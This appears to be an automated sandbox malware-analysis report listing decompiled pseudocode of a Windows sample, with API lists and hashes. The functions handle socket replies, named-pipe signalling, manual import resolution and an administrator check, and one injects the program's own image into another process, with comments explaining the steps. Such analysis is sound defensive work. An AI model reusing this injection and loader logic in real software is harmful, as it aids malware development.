                                                                                				intOrPtr _t53;
                                                                                				signed short _t66;
                                                                                				void** _t71;
                                                                                				void* _t76;
                                                                                				void* _t77;
                                                                                				void* _t78;
                                                                                				signed short _t79;
                                                                                				intOrPtr* _t81;
                                                                                				signed short _t82;
                                                                                				signed short _t83;
                                                                                				intOrPtr _t86;
                                                                                				signed int _t88;
                                                                                				void* _t90;
                                                                                				long _t91;
                                                                                				signed short _t92;
                                                                                				void* _t94;
                                                                                
                                                                                				_t77 = __ecx;
                                                                                				_t91 = 0;
                                                                                				 *_a12 = 1;
                                                                                				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
                                                                                				_t76 = _t50;
                                                                                				if(_t76 != 0) {
                                                                                					__imp__#23(2, 2, 0x11, _t78);
                                                                                					_t79 = _t50;
                                                                                					_v288 = _t79;
                                                                                					if(_t79 == 0 || _t79 == 0xffffffff) {
                                                                                						HeapFree(GetProcessHeap(), _t91, _t76);
                                                                                						_t53 = 0;
                                                                                						goto L37;
                                                                                					} else {
                                                                                						_v304 = 0;
                                                                                						while(1) {
                                                                                							_v300 = _t91;
                                                                                							if(_v304 != _t91) {
                                                                                								_push(_t91);
                                                                                							} else {
                                                                                								_push(0x100);
                                                                                							}
                                                                                							__imp__#9();
                                                                                							_t50 = E004026FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
                                                                                							_t94 = _t94 + 0xc;
                                                                                							if(_t50 != 0) {
                                                                                								goto L32;
                                                                                							}
                                                                                							_t86 = 0xc;
                                                                                							_t50 =  &_v276;
                                                                                							_v272 = _t79;
                                                                                							_v276 = 1;
                                                                                							_v284 = _t86;
                                                                                							_v280 = _t91;
                                                                                							__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
                                                                                							if(_t50 <= 0) {
                                                                                								goto L32;
                                                                                							}
                                                                                							_t50 = E0040EE2A(_t77, _t76, _t91, 4);
                                                                                							_t94 = _t94 + 0xc;
                                                                                							__imp__#16(_t79, _t76, 0x1000, _t91);
                                                                                							_t92 = _t50;
                                                                                							_v324 = _t92;
                                                                                							if(_t92 > 0 && _t92 > _t86) {
                                                                                								_t81 = __imp__#15;
                                                                                								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
                                                                                								if(_t88 == 3) {
                                                                                									L34:
                                                                                									 *_v44 = 2;
                                                                                									L35:
                                                                                									HeapFree(GetProcessHeap(), 0, _t76);
                                                                                									__imp__#3(_v292);
                                                                                									_t53 = _v308;
                                                                                									L37:
                                                                                									return _t53;
                                                                                								}
                                                                                								if(_t88 != 2) {
                                                                                									L16:
                                                                                									if(_t88 != 0) {
                                                                                										goto L32;
                                                                                									}
                                                                                									_t50 = E00402923(_t77, _t76, _t92);
                                                                                									_pop(_t77);
                                                                                									_v336 = _t50;
                                                                                									if(_t50 == 0) {
                                                                                										goto L32;
                                                                                									}
                                                                                									_v340 = _v340 & 0x00000000;
                                                                                									_v344 = _v344 & 0x00000000;
                                                                                									_t82 = _t50;
                                                                                									_v352 = _t82;
                                                                                									L20:
                                                                                									while(1) {
                                                                                										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
                                                                                											L30:
                                                                                											_t83 =  *_t82;
                                                                                											_v352 = _t83;
                                                                                											if(_t83 != 0) {
                                                                                												_t82 = _v352;
                                                                                												continue;
                                                                                											}
                                                                                											goto L31;
                                                                                										} else {
                                                                                											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
                                                                                											if(_t90 == 0) {
                                                                                												L31:
                                                                                												_t50 = E00402904(_v336);
                                                                                												if(_v344 != 0) {
                                                                                													goto L35;
                                                                                												}
                                                                                												goto L32;
                                                                                											}
                                                                                											E0040EE2A(_t77, _t90, 0, 0x108);
                                                                                											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
                                                                                											_t94 = _t94 + 0xc;
                                                                                											__imp__#15();
                                                                                											 *(_t90 + 4) = _t66 & 0x0000ffff;
                                                                                											_t33 = _t90 + 8; // 0x8
                                                                                											E00402871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
                                                                                											_t77 = _t66;
                                                                                											if( *((char*)(_t90 + 8)) != 0) {
                                                                                												_t71 = _v344;
                                                                                												_v344 = _t90;
                                                                                												if(_t71 != 0) {
                                                                                													 *_t71 = _t90;
                                                                                												} else {
                                                                                													_v348 = _t90;
                                                                                												}
                                                                                											} else {
                                                                                												HeapFree(GetProcessHeap(), 0, _t90);
                                                                                											}
                                                                                											_t82 = _v356;
                                                                                											goto L30;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								_push( *(_t76 + 2) & 0x0000ffff);
                                                                                								if( *_t81() < 0) {
                                                                                									goto L34;
                                                                                								}
                                                                                								goto L16;
                                                                                							}
                                                                                							L32:
                                                                                							_v308 = _v308 + 1;
                                                                                							if(_v308 < 2) {
                                                                                								_t79 = _v292;
                                                                                								_t91 = 0;
                                                                                								continue;
                                                                                							}
                                                                                							goto L35;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,74CB4F20), ref: 00402A83
                                                                                • HeapAlloc.KERNEL32(00000000,?,74CB4F20), ref: 00402A86
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
                                                                                • htons.WS2_32(00000000), ref: 00402ADB
                                                                                • select.WS2_32 ref: 00402B28
                                                                                • recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
                                                                                • htons.WS2_32(?), ref: 00402B71
                                                                                • htons.WS2_32(?), ref: 00402B8C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                • String ID:
                                                                                • API String ID: 1639031587-0
                                                                                • Opcode ID: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                • Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
                                                                                • Opcode Fuzzy Hash: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                • Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 98%
                                                                                			E0040405E(void* __ecx) {
                                                                                				unsigned int _v8;
                                                                                				unsigned int _v12;
                                                                                				void* _v16;
                                                                                				void* _v20;
                                                                                				intOrPtr _v24;
                                                                                				char _v28;
                                                                                				intOrPtr _v32;
                                                                                				char _v40;
                                                                                				void* _t40;
                                                                                				void* _t43;
                                                                                				void* _t49;
                                                                                				void* _t56;
                                                                                				void* _t62;
                                                                                				void* _t64;
                                                                                				long _t71;
                                                                                				void* _t82;
                                                                                				void* _t92;
                                                                                				void* _t93;
                                                                                				void* _t95;
                                                                                				void* _t97;
                                                                                				void* _t98;
                                                                                				void* _t99;
                                                                                				void* _t103;
                                                                                				void* _t104;
                                                                                
                                                                                				_t95 = __ecx;
                                                                                				_v8 = 0;
                                                                                				_t40 = CreateEventA(0, 1, 1, 0);
                                                                                				_v16 = _t40;
                                                                                				if(_t40 != 0) {
                                                                                					_t43 = E00404000(E00403ECD(_t95),  &_v20);
                                                                                					_t97 = _t98;
                                                                                					_t102 = 0x7d0;
                                                                                					_t92 = 0x100;
                                                                                					_t99 = 0x4122f8;
                                                                                					if(_t43 == 0) {
                                                                                						L10:
                                                                                						E0040EE2A(_t97, _t99, 0, _t92);
                                                                                						_t104 = _t103 + 0xc;
                                                                                						_t93 = 0xa;
                                                                                						while(1) {
                                                                                							_t93 = _t93 - 1;
                                                                                							_t99 = CreateNamedPipeA(E00403ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0);
                                                                                							if(_t99 != 0xffffffff) {
                                                                                								break;
                                                                                							}
                                                                                							Sleep(0x1f4);
                                                                                							if(_t93 != 0) {
                                                                                								continue;
                                                                                							}
                                                                                							CloseHandle(_v16);
                                                                                							return 0;
                                                                                						}
                                                                                						L14:
                                                                                						while(1) {
                                                                                							do {
                                                                                								L14:
                                                                                								while(1) {
                                                                                									do {
                                                                                										if(ConnectNamedPipe(_t99, 0) != 0) {
                                                                                											goto L16;
                                                                                										}
                                                                                										_t71 = GetLastError();
                                                                                										asm("sbb eax, eax");
                                                                                										if( ~(_t71 - 0x217) + 1 == 0) {
                                                                                											L25:
                                                                                											DisconnectNamedPipe(_t99);
                                                                                											continue;
                                                                                										}
                                                                                										L16:
                                                                                										_t49 = E00403F8C(_t99,  &_v12, 4, _v16, _t102);
                                                                                										_t104 = _t104 + 0x14;
                                                                                									} while (_t49 == 0);
                                                                                									_t92 = _v16;
                                                                                									_v8 = (_v12 >> 2) + _v12;
                                                                                									E00403F18(_t99,  &_v8, 4, _t92, _t102);
                                                                                									_t56 = E00403F8C(_t99,  &_v12, 4, _t92, _t102);
                                                                                									_t104 = _t104 + 0x28;
                                                                                									if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
                                                                                										goto L25;
                                                                                									} else {
                                                                                										_t62 = E00403F8C(_t99,  &_v28, 8, _t92, _t102);
                                                                                										_t104 = _t104 + 0x14;
                                                                                										if(_t62 == 0 || _v24 != 0xc) {
                                                                                											goto L25;
                                                                                										} else {
                                                                                											_t64 = E00403F8C(_t99,  &_v40, 0xc, _t92, _t102);
                                                                                											_t104 = _t104 + 0x14;
                                                                                											if(_t64 == 0) {
                                                                                												goto L25;
                                                                                											}
                                                                                											break;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							} while (_v28 != 1);
                                                                                							E00403F18(_t99,  &_v8, 4, _t92, _t102);
                                                                                							_t103 = _t104 + 0x14;
                                                                                							if(_v32 == 0) {
                                                                                								_t102 = CloseHandle;
                                                                                								CloseHandle(_t99);
                                                                                								CloseHandle(_t92);
                                                                                								E0040E318();
                                                                                								L8:
                                                                                								ExitProcess(0);
                                                                                							}
                                                                                							 *0x41215a =  *0x41215a + 1;
                                                                                						}
                                                                                					}
                                                                                					E0040EE2A(_t97, 0x4122f8, 0, 0x100);
                                                                                					_t103 = _t103 + 0xc;
                                                                                					if(_v20 == 0xffffffff) {
                                                                                						goto L10;
                                                                                					}
                                                                                					_v12 = E0040ECA5();
                                                                                					E00403F18(_v20,  &_v12, 4, _v16, 0x7d0);
                                                                                					_t82 = E00403F8C(_v20,  &_v8, 4, _v16, 0x7d0);
                                                                                					_t103 = _t103 + 0x28;
                                                                                					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
                                                                                						CloseHandle(_v20);
                                                                                						goto L10;
                                                                                					} else {
                                                                                						_v8 = _v8 + (_v8 >> 2);
                                                                                						E00403F18(_v20,  &_v8, 4, _v16, 0x7d0);
                                                                                						_t103 = _t103 + 0x14;
                                                                                						goto L8;
                                                                                					}
                                                                                				}
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
                                                                                • ExitProcess.KERNEL32 ref: 00404121
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEventExitProcess
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 2404124870-2980165447
                                                                                • Opcode ID: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                • Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
                                                                                • Opcode Fuzzy Hash: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                • Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00406069(_Unknown_base(*)()* _a4) {
                                                                                				intOrPtr* _v8;
                                                                                				signed int _v12;
                                                                                				struct HINSTANCE__* _v16;
                                                                                				intOrPtr _t47;
                                                                                				_Unknown_base(*)()* _t48;
                                                                                				_Unknown_base(*)()* _t50;
                                                                                				struct HINSTANCE__* _t52;
                                                                                				_Unknown_base(*)()* _t53;
                                                                                				_Unknown_base(*)()* _t54;
                                                                                				_Unknown_base(*)()* _t55;
                                                                                				signed int _t56;
                                                                                				_Unknown_base(*)()* _t59;
                                                                                				_Unknown_base(*)()* _t62;
                                                                                				_Unknown_base(*)()* _t63;
                                                                                				intOrPtr _t69;
                                                                                				_Unknown_base(*)()* _t76;
                                                                                				_Unknown_base(*)()* _t77;
                                                                                				intOrPtr* _t82;
                                                                                				void* _t85;
                                                                                				intOrPtr* _t87;
                                                                                				_Unknown_base(*)()* _t89;
                                                                                
                                                                                				_t82 = _a4;
                                                                                				_t47 =  *_t82;
                                                                                				_t3 = _t82 + 4; // 0x65e85621
                                                                                				_t69 =  *_t3;
                                                                                				_v12 = 1;
                                                                                				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
                                                                                					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
                                                                                					_t48 = IsBadReadPtr(_t85, 0x14);
                                                                                					__eflags = _t48;
                                                                                					if(_t48 != 0) {
                                                                                						L29:
                                                                                						return _v12;
                                                                                					}
                                                                                					_t87 = _t85 + 0x10;
                                                                                					_v8 = _t87;
		// Import resolver: walks IMAGE_IMPORT_DESCRIPTOR entries (0x14 bytes each), loads each
		// module with LoadLibraryA, then resolves every thunk with GetProcAddress (by name,
		// skipping the 2-byte hint, or by ordinal when the high bit is set) and writes the
		// address into the IAT; _a4 holds the IAT-minus-INT delta. Loaded module handles are
		// collected in the array at _t82+8 (count at _t82+0xc).
		while(1) {
			_t50 = *(_t87 - 4); // IMAGE_IMPORT_DESCRIPTOR.Name (RVA)
			__eflags = _t50;
			if(_t50 == 0) {
				goto L29; // null descriptor terminates the table
			}
			_t52 = LoadLibraryA(_t50 + _t69); // _t69 = image base
			_v16 = _t52;
			__eflags = _t52 - 0xffffffff;
			if(_t52 == 0xffffffff) {
				L28:
				_t44 = &_v12;
				*_t44 = _v12 & 0x00000000;
				__eflags = *_t44;
				goto L29;
			}
			_t10 = _t82 + 8; // 0x8bfffffa
			_t53 = *_t10;
			__eflags = _t53;
			if(_t53 != 0) {
				_t14 = _t82 + 0xc; // 0x28408b06
				_t54 = E0040EBED(_t53, 4 + *_t14 * 4); // grow handle array
			} else {
				_t11 = _t82 + 0xc; // 0x28408b06
				_t54 = E0040EBCC(4 + *_t11 * 4); // allocate handle array
			}
			*(_t82 + 8) = _t54;
			__eflags = _t54;
			if(_t54 == 0) {
				goto L28;
			} else {
				_t18 = _t82 + 0xc; // 0x28408b06
				*((intOrPtr*)(_t54 + *_t18 * 4)) = _v16; // store module handle
				*(_t82 + 0xc) = *(_t82 + 0xc) + 1;
				_t55 = *(_t87 - 0x10); // OriginalFirstThunk (INT RVA)
				__eflags = _t55;
				if(_t55 == 0) {
					_t89 = *_t87 + _t69; // no INT: FirstThunk serves as both
					__eflags = _t89;
					_t76 = _t89;
				} else {
					_t89 = _t55 + _t69; // INT
					_t76 = *_v8 + _t69; // FirstThunk (IAT)
				}
				_t56 = *_t89;
				__eflags = _t56;
				if(_t56 == 0) {
					L25:
					__eflags = _v12;
					if(_v12 == 0) {
						goto L29;
					}
					_v8 = _v8 + 0x14; // next descriptor
					_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
					__eflags = _t59;
					if(_t59 == 0) {
						_t87 = _v8;
						continue;
					}
					goto L29;
				} else {
					_a4 = _t76;
					_a4 = _a4 - _t89; // IAT - INT
					__eflags = _t56;
					do {
						if(__eflags >= 0) {
							// high bit clear: import by name; +2 skips IMAGE_IMPORT_BY_NAME.Hint
							_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
							__eflags = _t62;
							if(_t62 == 0) {
								L21:
								_t63 = _a4;
								__eflags = *(_t63 + _t89);
								if( *(_t63 + _t89) == 0) {
									_t38 = &_v12;
									*_t38 = _v12 & 0x00000000;
									__eflags = *_t38;
									goto L25;
								}
								goto L22;
							}
							_t77 = _a4;
							__eflags = _t62 - *(_t77 + _t89);
							if(_t62 == *(_t77 + _t89)) {
								goto L21;
							}
							L20:
							*(_t77 + _t89) = _t62; // patch IAT slot
							goto L21;
						}
						// high bit set: import by ordinal (low 16 bits)
						_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
						_t77 = _a4;
						goto L20;
						L22:
						_t89 = _t89 + 4;
						_t56 = *_t89;
						__eflags = _t56;
					} while (__eflags != 0);
					goto L25;
				}
			}
		}
		goto L29;
	}
	return 1;
}


APIs
• IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
• LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
• GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
• IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E
Memory Dump Source
• Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Read$AddressLibraryLoadProc
• String ID:
• API String ID: 2438460464-0
• Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
• Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
• Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
• Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84
Uniqueness Score: -1.00%

C-Code - Quality: 68%
// Checks whether the calling token is a member of BUILTIN\Administrators (S-1-5-32-544:
// SECURITY_NT_AUTHORITY, SECURITY_BUILTIN_DOMAIN_RID 0x20, DOMAIN_ALIAS_RID_ADMINS 0x220)
// and caches the result at 0x412048; when the token is not a member it calls E00406E36(0x12, 0).
E00406EDD() {
	int _v8;
	void* _v12;
	short _v16;
	struct _SID_IDENTIFIER_AUTHORITY _v20;
	signed int _t12;
	int _t15;
	int* _t16;

	_t12 = *0x412048; // 0x0
	if(_t12 < 0) {
		_v20.Value = 0;
		_v16 = 0x500; // authority bytes {0,0,0,0,0,5} = SECURITY_NT_AUTHORITY
		_t15 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, &_v12);
		_v8 = _t15;
		if(_t15 != 0) {
			_t6 = &_v8; // 0x40702a
			_t16 = _t6;
			__imp__CheckTokenMembership(0, _v12, _t16); // _v8 receives IsMember
			if(_t16 != 0) {
				*0x412048 = 0 | _v8 == 0x00000000; // 1 when NOT an administrator
			}
			FreeSid(_v12);
		}
		_t12 = *0x412048; // 0x0
		if(_t12 != 0) {
			_t12 = E00406E36(0x12, 0);
			*0x412048 = _t12;
		}
	}
	return _t12;
}


APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
• CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
• FreeSid.ADVAPI32(?), ref: 00406F3E
Memory Dump Source
• Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID: *p@
• API String ID: 3429775523-2474123842
• Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
• Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
• Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
• Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18
Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Copies the current module image (SizeOfImage read from the PE optional header) into a
// local buffer, adjusts the copy for the target address (E004062B7, likely relocation
// fix-up), and writes it into process _a8 at a new PAGE_EXECUTE_READWRITE region; _a16
// receives the remote base and _a12 the remote address corresponding to _a4.
E0040637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
	void* _v8;
	void* _t15;
	void* _t16;
	long _t26;
	struct HINSTANCE__* _t32;
	void* _t37;

	if(_a8 != 0) {
		_t32 = GetModuleHandleA(0); // own image base
		_t26 = *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50); // e_lfanew -> OptionalHeader.SizeOfImage
		_t15 = VirtualAlloc(0, _t26, 0x1000, 4); // MEM_COMMIT, PAGE_READWRITE
		_v8 = _t15;
		if(_t15 == 0) {
			L5:
			_t16 = 0;
		} else {
			E0040EE08(_t15, _t32, _t26); // copy the image into the local buffer (likely memcpy)
			_t37 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40); // MEM_COMMIT, PAGE_EXECUTE_READWRITE
			if(_t37 == 0) {
				goto L5;
			} else {
				E004062B7(_v8, _t37); // adjust the copy for the remote base
				if(WriteProcessMemory(_a8, _t37, _v8, _t26, 0) != 0) {
					*_a16 = _t37;
					*_a12 = _t37 - _t32 + _a4; // rebase _a4 into the remote image
					_t16 = 1;
				} else {
					goto L5;
				}
			}
		}
                                                                                					return _t16;
                                                                                				} else {
                                                                                					return 0;
                                                                                				}
                                                                                			}


                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,EntryPoint), ref: 0040638F
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,00409816,EntryPoint), ref: 004063A9
                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 004063CA
                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 004063EB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 1965334864-0
                                                                                • Opcode ID: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                • Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
                                                                                • Opcode Fuzzy Hash: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                • Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 020865F6
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02086610
                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 02086631
                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 02086652
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 1965334864-0
                                                                                • Opcode ID: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                • Instruction ID: 8f2f23149897569958edf0afc58b27ad45b992c6b2ff9c1b4757461061f986fd
                                                                                • Opcode Fuzzy Hash: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                • Instruction Fuzzy Hash: 38119171600358BFDB21AF65DC0AF9B3FACEB057A5F014024FA09E7250DBB2DD109AA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E00408E26(void* __ecx, void* __edx, long _a4, void* _a8, long _a12, void* _a16, long _a20, DWORD* _a24) {
                                                                                				char _v12;
                                                                                				int _t13;
                                                                                				DWORD* _t14;
                                                                                				int _t15;
                                                                                				void* _t20;
                                                                                				void* _t23;
                                                                                
                                                                                				_t22 = __ecx;
                                                                                				_push(__ecx);
                                                                                				_push(__ecx);
                                                                                				_t20 = CreateFileW(E00402508(0x4129f8,  &E0041076C, 0xe, 0xec64, 0x7bac), 0xc0000000, 0, 0, 2, 0x80, 0);
                                                                                				E0040EE2A(_t22, 0x4129f8, 0, 0x200);
                                                                                				if(_t20 == 0xffffffff) {
                                                                                					_t13 = 0;
                                                                                				} else {
                                                                                					_t23 = _a8;
                                                                                					if(_t23 == 0) {
                                                                                						E00408DF1( &_v12);
                                                                                						_t23 =  &_v12;
                                                                                						_a12 = 8;
                                                                                					}
                                                                                					_t14 = _a24;
                                                                                					 *_t14 = 0;
                                                                                					_t15 = DeviceIoControl(_t20, _a4, _t23, _a12, _a16, _a20, _t14, 0);
                                                                                					CloseHandle(_t20);
                                                                                					_t13 = _t15;
                                                                                				}
                                                                                				return _t13;
                                                                                			}


                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000100), ref: 00408E5F
                                                                                • DeviceIoControl.KERNEL32 ref: 00408EAB
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408EB4
                                                                                  • Part of subcall function 00408DF1: GetSystemTime.KERNEL32(?,004129F8,?,?,00408E8B,?), ref: 00408DFC
                                                                                  • Part of subcall function 00408DF1: SystemTimeToFileTime.KERNEL32(?,00408E8B,?,?,00408E8B,?), ref: 00408E0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$FileSystem$CloseControlCreateDeviceHandle
                                                                                • String ID:
                                                                                • API String ID: 3754425949-0
                                                                                • Opcode ID: 2cf703b3f3d70fe1d21397a344fcfe55e6ffa78bdc2e74738428da1b6bf63eb9
                                                                                • Instruction ID: 6158522553dbc768b3fa764069f531a078bfca64040c8912efb0c234455cb59d
                                                                                • Opcode Fuzzy Hash: 2cf703b3f3d70fe1d21397a344fcfe55e6ffa78bdc2e74738428da1b6bf63eb9
                                                                                • Instruction Fuzzy Hash: CD11C8726402047BEB115F95CD4EEDB3F6DEB85714F00452AF611B62C1DAB9985087A8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004088B0(intOrPtr _a4) {
                                                                                				intOrPtr _t98;
                                                                                				void* _t99;
                                                                                				intOrPtr _t101;
                                                                                
                                                                                				_t101 = _a4;
                                                                                				E0040EE2A(_t99, _t101, 0, 0x3e0);
                                                                                				 *((intOrPtr*)(_t101 + 0xc0)) = __imp__#19;
                                                                                				 *((intOrPtr*)(_t101 + 0xc4)) = __imp__#16;
                                                                                				 *((intOrPtr*)(_t101 + 0xc8)) = __imp__#23;
                                                                                				 *((intOrPtr*)(_t101 + 0xcc)) = __imp__#4;
                                                                                				 *((intOrPtr*)(_t101 + 0xd0)) = __imp__#3;
                                                                                				 *((intOrPtr*)(_t101 + 0xd4)) = __imp__#21;
                                                                                				 *((intOrPtr*)(_t101 + 0xd8)) = __imp__#2;
                                                                                				 *((intOrPtr*)(_t101 + 0xdc)) = __imp__#13;
                                                                                				 *((intOrPtr*)(_t101 + 0xe0)) = __imp__#1;
